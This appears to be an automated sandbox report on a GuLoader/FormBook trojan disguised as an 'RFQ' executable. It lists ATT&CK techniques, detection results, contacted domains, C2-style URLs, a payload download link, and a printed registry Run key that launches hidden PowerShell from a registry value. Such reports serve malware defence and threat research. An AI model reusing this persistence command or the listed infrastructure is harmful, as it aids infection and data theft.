Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	411 Process Injection	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	411 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ-LOTUS 2024.exe	18%	ReversingLabs	Win32.Trojan.Guloader
RFQ-LOTUS 2024.exe	37%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Minken.exe	37%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Minken.exe	18%	ReversingLabs	Win32.Trojan.Guloader

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
thequirkyartman.co.uk	0%	Virustotal		Browse
www.luckydomainz.shop	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://www.ftp.ftp://ftp.gopher.	0%	Avira URL Cloud	safe
https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.bin	0%	Avira URL Cloud	safe
http://www.shevgin.top/gzu1/	0%	Avira URL Cloud	safe
http://www.holein1sa.com/gzu1/	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.binP	0%	Avira URL Cloud	safe
http://www.cngdesk.com/gzu1/	0%	Avira URL Cloud	safe
http://www.qdzdvrk.shop/gzu1/	0%	Avira URL Cloud	safe
http://www.holein1sa.com/gzu1/	0%	Virustotal		Browse
http://www.wrgardenrooms.co.uk/gzu1/?7Br4wVx=DZKnd6OrhyjSh2P2xCOvgjG8rz+hGzA4eaP9rB/8/NwqVRaBiTGrNKLJLz7ywVDYeyRbngiLRWWycf7Qti6/6bHZgHdFcdMy6ZljqO/4pGth4X6Se5W+Nzg=&Y0H=66WP	0%	Avira URL Cloud	safe
http://www.luckydomainz.shop/gzu1/	0%	Avira URL Cloud	safe
https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.bin	0%	Virustotal		Browse
http://www.qdzdvrk.shop/gzu1/?7Br4wVx=Nc0+1pbABO8bD/b9Wv0Sz/i9XafwHDVY8M6N2p8pgISzJF1z8hz/2TN9JRK2WZ6dwSE5fOiQX7UBBH0PbssqVTyxxREEszEt/mQOHjL8tipl5lQA7LzYQXo=&Y0H=66WP	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
https://thequirkyartman.co.uk/1	0%	Avira URL Cloud	safe
http://www.cngdesk.com/gzu1/?7Br4wVx=qHrU/ycFjG31mFHi/zg+n8+l32EylT8zNFfCUKb22Nc1EMRw4DAgdGnBBmRrxsDJ2EJ0WhI3vZ6+3kEV8pm1/TOgq31Qtmfxg5HCN3XsFKKvE88rt5vqtco=&Y0H=66WP	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.luckydomainz.shop/gzu1/	2%	Virustotal		Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
http://www.holein1sa.com/gzu1/?7Br4wVx=VT8K0v27N5bGcxCaj+YYD9yKQ06FddJKrderC5Pcma0WiavcK12ZIFD1KaFj6jAJAc5C6yt/FybBtASqq9iUhSi+wlWN91M6kc0r7o/QXgUEGL9jkgBqabg=&Y0H=66WP	0%	Avira URL Cloud	safe
https://thequirkyartman.co.uk/A	0%	Avira URL Cloud	safe
http://www.luckydomainz.shop/gzu1/?7Br4wVx=KINnc6YGk8HV8ei39HElS4I1DjF/UhmuqXZgjVMGlWHMmd+U6gw6qLbNy3URNR7Ucze4YdZnZ4EfPoI0+cgnC/yXbL3Ii5JH3BdQoxHuvJDFjkEgUbJI9tc=&Y0H=66WP	0%	Avira URL Cloud	safe
http://www.shevgin.top/gzu1/?7Br4wVx=kn3Ys08AlLLcTB8c3mh/ndv1lRtAG+6GF4y4CDUXNC25SpPwtUp0dEf6cWyblfDnSRkBocYG/2n1J5W5fw7V+kx237huy5oCC9wi7uOTnETtOi+sV7JzakA=&Y0H=66WP	0%	Avira URL Cloud	safe
http://www.wrgardenrooms.co.uk/gzu1/	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Virustotal		Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.wrgardenrooms.co.uk	217.160.0.13	true	false		unknown
thequirkyartman.co.uk	104.21.31.110	true	false	0%, Virustotal, Browse	unknown
www.holein1sa.com	213.171.195.105	true	false		unknown
www.cngdesk.com	47.243.134.243	true	false		unknown
vegus24.org	3.33.130.190	true	false		unknown
parkingpage.namecheap.com	91.195.240.19	true	false		high
www.google.com	142.251.32.100	true	false		high
cjhm.737773.cn	47.76.136.160	true	false		unknown
www.shevgin.top	162.0.237.22	true	false		unknown
www.theertyuiergthjk.homes	unknown	unknown	true		unknown
www.vegus24.org	unknown	unknown	true		unknown
www.golfscorecardus.com	unknown	unknown	true		unknown
www.sfebg.com	unknown	unknown	true		unknown
www.qdzdvrk.shop	unknown	unknown	true		unknown
www.luckydomainz.shop	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.maerealtysg.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/async/newtab_promos	false		high
http://www.holein1sa.com/gzu1/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.shevgin.top/gzu1/	false	Avira URL Cloud: safe	unknown
https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.bin	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.cngdesk.com/gzu1/	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGLifzrEGIjAtAotW97xiDhn6fwnyvQS7r43dpv7E1GI8YkXR8lHG-pScMOWVMJEg8fQ1Eg1M3M4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
http://www.qdzdvrk.shop/gzu1/	false	Avira URL Cloud: safe	unknown
http://www.wrgardenrooms.co.uk/gzu1/?7Br4wVx=DZKnd6OrhyjSh2P2xCOvgjG8rz+hGzA4eaP9rB/8/NwqVRaBiTGrNKLJLz7ywVDYeyRbngiLRWWycf7Qti6/6bHZgHdFcdMy6ZljqO/4pGth4X6Se5W+Nzg=&Y0H=66WP	false	Avira URL Cloud: safe	unknown
http://www.luckydomainz.shop/gzu1/	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.qdzdvrk.shop/gzu1/?7Br4wVx=Nc0+1pbABO8bD/b9Wv0Sz/i9XafwHDVY8M6N2p8pgISzJF1z8hz/2TN9JRK2WZ6dwSE5fOiQX7UBBH0PbssqVTyxxREEszEt/mQOHjL8tipl5lQA7LzYQXo=&Y0H=66WP	false	Avira URL Cloud: safe	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
http://www.cngdesk.com/gzu1/?7Br4wVx=qHrU/ycFjG31mFHi/zg+n8+l32EylT8zNFfCUKb22Nc1EMRw4DAgdGnBBmRrxsDJ2EJ0WhI3vZ6+3kEV8pm1/TOgq31Qtmfxg5HCN3XsFKKvE88rt5vqtco=&Y0H=66WP	false	Avira URL Cloud: safe	unknown
http://www.holein1sa.com/gzu1/?7Br4wVx=VT8K0v27N5bGcxCaj+YYD9yKQ06FddJKrderC5Pcma0WiavcK12ZIFD1KaFj6jAJAc5C6yt/FybBtASqq9iUhSi+wlWN91M6kc0r7o/QXgUEGL9jkgBqabg=&Y0H=66WP	false	Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGLafzrEGIjBT_EUKA1u8_t9vjN9UnmJR1K8IADZGF2jLdWpWbLfOyPU11p8YoYWauUFitc_MPvgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
http://www.luckydomainz.shop/gzu1/?7Br4wVx=KINnc6YGk8HV8ei39HElS4I1DjF/UhmuqXZgjVMGlWHMmd+U6gw6qLbNy3URNR7Ucze4YdZnZ4EfPoI0+cgnC/yXbL3Ii5JH3BdQoxHuvJDFjkEgUbJI9tc=&Y0H=66WP	false	Avira URL Cloud: safe	unknown
http://www.shevgin.top/gzu1/?7Br4wVx=kn3Ys08AlLLcTB8c3mh/ndv1lRtAG+6GF4y4CDUXNC25SpPwtUp0dEf6cWyblfDnSRkBocYG/2n1J5W5fw7V+kx237huy5oCC9wi7uOTnETtOi+sV7JzakA=&Y0H=66WP	false	Avira URL Cloud: safe	unknown
http://www.wrgardenrooms.co.uk/gzu1/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000005.00000002.4126707039.0000024951000000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.ftp.ftp://ftp.gopher.	Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000005.00000003.1691443532.00000249512A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.0000024951307000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1691443532.00000249512F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	RFQ-LOTUS 2024.exe, 00000000.00000000.1625842032.000000000040A000.00000008.00000001.01000000.00000003.sdmp, RFQ-LOTUS 2024.exe, 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Minken.exe, 0000000C.00000000.2415788858.000000000040A000.00000008.00000001.01000000.00000009.sdmp	false		high
https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.binP	Minken.exe, 0000000C.00000002.2923752345.0000000007085000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2580705350.0000000005436000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000005.00000003.1691443532.0000024951272000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Minken.exe, 0000000C.00000001.2418106236.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://thequirkyartman.co.uk/1	Minken.exe, 0000000C.00000002.2923752345.00000000070A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2580705350.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2582911000.0000000006349000.00000004.00000800.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Minken.exe, 0000000C.00000001.2418106236.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://thequirkyartman.co.uk/A	Minken.exe, 0000000C.00000002.2923752345.00000000070A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2580705350.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000005.00000003.1691443532.00000249512C2000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.0.237.22	www.shevgin.top	Canada	22612	NAMECHEAP-NETUS	false
217.160.0.13	www.wrgardenrooms.co.uk	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.251.32.100	www.google.com	United States	15169	GOOGLEUS	false
47.243.134.243	www.cngdesk.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
104.21.31.110	thequirkyartman.co.uk	United States	13335	CLOUDFLARENETUS	false
3.33.130.190	vegus24.org	United States	8987	AMAZONEXPANSIONGB	false
47.76.136.160	cjhm.737773.cn	United States	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
213.171.195.105	www.holein1sa.com	United Kingdom	8560	ONEANDONE-ASBrauerstrasse48DE	false

Private

IP
192.168.2.16
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435343
Start date and time:	2024-05-02 15:05:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ-LOTUS 2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@38/19@16/13
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 89% Number of executed functions: 97 Number of non-executed functions: 255
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 142.251.40.163, 64.233.180.84, 142.251.40.142, 34.104.35.123, 23.51.58.94, 23.206.121.20, 192.229.211.108, 142.250.72.99, 142.251.40.110
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target powershell.exe, PID 6556 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:07:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Paraferingen %Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)
14:07:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Paraferingen %Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)
15:05:55	API Interceptor	21x Sleep call for process: powershell.exe modified
15:05:57	API Interceptor	2x Sleep call for process: svchost.exe modified
15:08:33	API Interceptor	3324022x Sleep call for process: fc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
217.160.0.13	D0C9284382-Indleveringsstedet.vbs	Get hash	malicious	Remcos	Browse
	CGPJ.apk	Get hash	malicious	Unknown	Browse
	ZRz0Aq1Rf0.dll	Get hash	malicious	Netwalker Sodinokibi	Browse
239.255.255.250	KpiLt01Slj.exe	Get hash	malicious	Unknown	Browse
	https://bafybeigjxmg3ulqmytt642sjwzluuvy7s2m2z4xbd4pqokaid5z3upavoi.ipfs.cf-ipfs.com/#mavaz@emfa.pt	Get hash	malicious	HTMLPhisher	Browse
	https://sharepoint.3cx-systems.co.uk/saga/recap.html	Get hash	malicious	HTMLPhisher	Browse
	4yFaZU8fhT.exe	Get hash	malicious	RisePro Stealer	Browse
	undelivered Messages - Copie.htm	Get hash	malicious	HTMLPhisher	Browse
	http://event.strategiedirect.com	Get hash	malicious	Unknown	Browse
	Zehnder_SuiteCommerce_Zehnder Rittling (4 29 2024).xlsx	Get hash	malicious	Unknown	Browse
	8DMUHFukm8.exe	Get hash	malicious	Unknown	Browse
	MejqsB9tx9.exe	Get hash	malicious	Amadey	Browse
	OUZXNOqKXg.exe	Get hash	malicious	RisePro Stealer	Browse
47.243.134.243	confirmation de cuenta.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cngdesk.com/op6t/
	FV- 12.429#U00a0TUSOCAL.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cngdesk.com/op6t/
	FV- 12.429#U00a0TUSOCAL.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cngdesk.com/op6t/
91.195.240.19	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	www.primeplay88.org/ufuh/
	yZcecBUXN7.exe	Get hash	malicious	FormBook	Browse	www.dk48.lol/0hhg/
	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tondex.finance/s8o3/
	RFQ02212420.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.solesense.pro/aleu/
	SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exe	Get hash	malicious	FormBook	Browse	www.luckydomainz.shop/wu8v/
	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.solesense.pro/aleu/
	DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exe	Get hash	malicious	FormBook	Browse	www.safeguardyourhouse.com/34ev/
	DHL Overdue Account Notice - 1606622076.PDF.exe	Get hash	malicious	FormBook	Browse	www.safeguardyourhouse.com/34ev/
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	www.primeplay88.org/ufuh/
	prnportccy.vbs	Get hash	malicious	FormBook	Browse	www.yesbet88.party/2whg/?tZmp=CfGpi2Bp2bbH12U&o0Zx=L/E48Elm+U74prvf7fR/3GGpz8JbXyGzTxMI/uVhvl9NPin+HdUNlu8ZPQF6I5yGsGNyKZhw0D5Xg9iN/s8eBV/sSvDNtA5Dq8opj25A7BUBs3s9vJKLWwc=

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	91.195.240.19
	yZcecBUXN7.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	RFQ02212420.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	DHL Overdue Account Notice - 1606622076.PDF.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	91.195.240.19
	prnportccy.vbs	Get hash	malicious	FormBook	Browse	91.195.240.19
www.holein1sa.com	PO0424024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.171.195.105
www.cngdesk.com	confirmation de cuenta.exe	Get hash	malicious	FormBook, GuLoader	Browse	47.243.134.243
	FV- 12.429#U00a0TUSOCAL.exe	Get hash	malicious	FormBook, GuLoader	Browse	47.243.134.243
	FV- 12.429#U00a0TUSOCAL.exe	Get hash	malicious	FormBook, GuLoader	Browse	47.243.134.243
www.wrgardenrooms.co.uk	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.160.0.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exe	Get hash	malicious	FormBook	Browse	162.0.225.191
	prnportccy.vbs	Get hash	malicious	FormBook	Browse	198.54.117.242
	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.255.119.150
	Inquiries_PDF.exe	Get hash	malicious	FormBook	Browse	198.54.117.242
	Invoice-pdf.exe	Get hash	malicious	AgentTesla	Browse	162.0.235.253
	PO55AB023.exe	Get hash	malicious	AgentTesla	Browse	104.219.248.94
	JJUmnnkIxSCyKik.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.0.232.244
	31jvjGbPV0.exe	Get hash	malicious	Unknown	Browse	63.250.38.89
	31jvjGbPV0.exe	Get hash	malicious	Unknown	Browse	63.250.38.89
	Advanced Scanner.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	198.187.29.152
SEDO-ASDE	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	91.195.240.19
	yZcecBUXN7.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	00389692222221902.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	RFQ02212420.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	confirmation de cuenta.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	Udskriftsskemaernes.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	DHL Overdue Account Notice - 1606622076.PDF.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
CLOUDFLARENETUS	325445263.img	Get hash	malicious	Unknown	Browse	172.67.187.200
	https://bafybeigjxmg3ulqmytt642sjwzluuvy7s2m2z4xbd4pqokaid5z3upavoi.ipfs.cf-ipfs.com/#mavaz@emfa.pt	Get hash	malicious	HTMLPhisher	Browse	104.22.59.100
	https://sharepoint.3cx-systems.co.uk/saga/recap.html	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	NOA.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	4yFaZU8fhT.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	undelivered Messages - Copie.htm	Get hash	malicious	HTMLPhisher	Browse	104.21.84.200
	RY5YJaMEWE.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	Approved E-DO PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	Order No Q240419617006.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	OUZXNOqKXg.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
